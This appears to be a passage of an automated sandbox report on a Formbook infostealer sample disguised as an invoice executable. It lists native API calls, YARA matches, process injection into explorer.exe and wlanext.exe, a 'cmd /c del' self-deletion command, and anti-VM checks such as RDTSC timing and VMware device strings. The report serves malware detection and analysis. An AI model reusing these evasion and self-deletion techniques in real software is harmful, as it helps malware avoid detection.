          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789A80 NtOpenDirectoryObject,8_2_03789A80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789950 NtQueueApcThread,8_2_03789950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037899D0 NtCreateProcessEx,8_2_037899D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0378B040 NtSuspendThread,8_2_0378B040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789820 NtEnumerateKey,8_2_03789820
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037898F0 NtReadVirtualMemory,8_2_037898F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037898A0 NtWriteVirtualMemory,8_2_037898A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0378A770 NtOpenThread,8_2_0378A770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789770 NtSetInformationFile,8_2_03789770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789760 NtOpenProcess,8_2_03789760
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789730 NtQueryVirtualMemory,8_2_03789730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0378A710 NtOpenProcessToken,8_2_0378A710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037897A0 NtUnmapViewOfSection,8_2_037897A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789670 NtQueryInformationProcess,8_2_03789670
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789610 NtEnumerateValueKey,8_2_03789610
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789560 NtWriteFile,8_2_03789560
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0378AD30 NtSetContextThread,8_2_0378AD30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789520 NtWaitForSingleObject,8_2_03789520
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037895F0 NtQueryInformationFile,8_2_037895F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C83A0 NtAllocateVirtualMemory,8_2_030C83A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C8270 NtReadFile,8_2_030C8270
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C82F0 NtClose,8_2_030C82F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C81C0 NtCreateFile,8_2_030C81C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C826C NtReadFile,8_2_030C826C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C82EA NtClose,8_2_030C82EA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_030C81BA NtCreateFile,8_2_030C81BA
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0374B150 appears 35 times
          Source: C:\Users\user\Desktop\INV74321.exeCode function: String function: 00ADB150 appears 35 times
          Source: C:\Users\user\Desktop\INV74321.exeCode function: String function: 0041A0A0 appears 38 times
          Source: INV74321.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: INV74321.exe, 00000000.00000003.208336740.0000000002C7F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INV74321.exe
          Source: INV74321.exe, 00000000.00000002.221214353.0000000000A70000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs INV74321.exe
          Source: INV74321.exe, 00000001.00000002.257734527.0000000000D5F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INV74321.exe
          Source: INV74321.exe, 00000001.00000002.257457719.0000000000A62000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs INV74321.exe
          Source: INV74321.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@16/7
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_01
          Source: C:\Users\user\Desktop\INV74321.exeFile created: C:\Users\user\AppData\Local\Temp\nso60E4.tmp
          Source: INV74321.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\INV74321.exeFile read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\INV74321.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: INV74321.exeVirustotal: Detection: 30%
          Source: INV74321.exeMetadefender: Detection: 14%
          Source: INV74321.exeReversingLabs: Detection: 72%
          Source: C:\Users\user\Desktop\INV74321.exeFile read: C:\Users\user\Desktop\INV74321.exe
          Source: unknownProcess created: C:\Users\user\Desktop\INV74321.exe 'C:\Users\user\Desktop\INV74321.exe'
          Source: C:\Users\user\Desktop\INV74321.exeProcess created: C:\Users\user\Desktop\INV74321.exe 'C:\Users\user\Desktop\INV74321.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INV74321.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\INV74321.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: INV74321.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000005.00000000.244743152.000000000F686000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: INV74321.exe, 00000000.00000003.214730841.0000000002B90000.00000004.00000001.sdmp, INV74321.exe, 00000001.00000002.257577232.0000000000BCF000.00000040.00000001.sdmp, wlanext.exe, 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: INV74321.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: INV74321.exe, 00000001.00000002.257445495.0000000000A50000.00000040.00000001.sdmp
          Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000005.00000000.244743152.000000000F686000.00000004.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: INV74321.exe, 00000001.00000002.257445495.0000000000A50000.00000040.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\INV74321.exeUnpacked PE file: 1.2.INV74321.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\INV74321.exeFile created: C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dll
          Source: C:\Users\user\Desktop\INV74321.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\INV74321.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\INV74321.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000030B85E4 second address: 00000000030B85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000030B897E second address: 00000000030B8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\INV74321.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Windows\explorer.exe TID: 5468Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 6748Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
          Source: explorer.exe, 00000005.00000000.238911410.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.238911410.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000005.00000000.231378455.0000000004DF3000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.231773140.0000000004E61000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000005.00000000.237685371.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.237953316.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.233054387.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000005.00000000.238911410.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000005.00000000.238911410.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.239170353.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000005.00000002.484763017.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000005.00000000.237685371.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.237685371.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.242904889.00000000089C5000.00000004.00000001.sdmpBinary or memory string: qeMusic
          Source: explorer.exe, 00000005.00000000.237685371.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\INV74321.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\INV74321.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00409B20 LdrLoadDll,1_2_00409B20
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA740D mov eax, dword ptr fs:[00000030h]1_2_00BA740D
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56C0A mov eax, dword ptr fs:[00000030h]1_2_00B56C0A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56C0A mov eax, dword ptr fs:[00000030h]1_2_00B56C0A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56C0A mov eax, dword ptr fs:[00000030h]1_2_00B56C0A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56C0A mov eax, dword ptr fs:[00000030h]1_2_00B56C0A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF746D mov eax, dword ptr fs:[00000030h]1_2_00AF746D
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6C450 mov eax, dword ptr fs:[00000030h]1_2_00B6C450
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6C450 mov eax, dword ptr fs:[00000030h]1_2_00B6C450
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0A44B mov eax, dword ptr fs:[00000030h]1_2_00B0A44B
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B01DB5 mov eax, dword ptr fs:[00000030h]1_2_00B01DB5
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B01DB5 mov eax, dword ptr fs:[00000030h]1_2_00B01DB5
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B01DB5 mov eax, dword ptr fs:[00000030h]1_2_00B01DB5
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B035A1 mov eax, dword ptr fs:[00000030h]1_2_00B035A1
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA05AC mov eax, dword ptr fs:[00000030h]1_2_00BA05AC
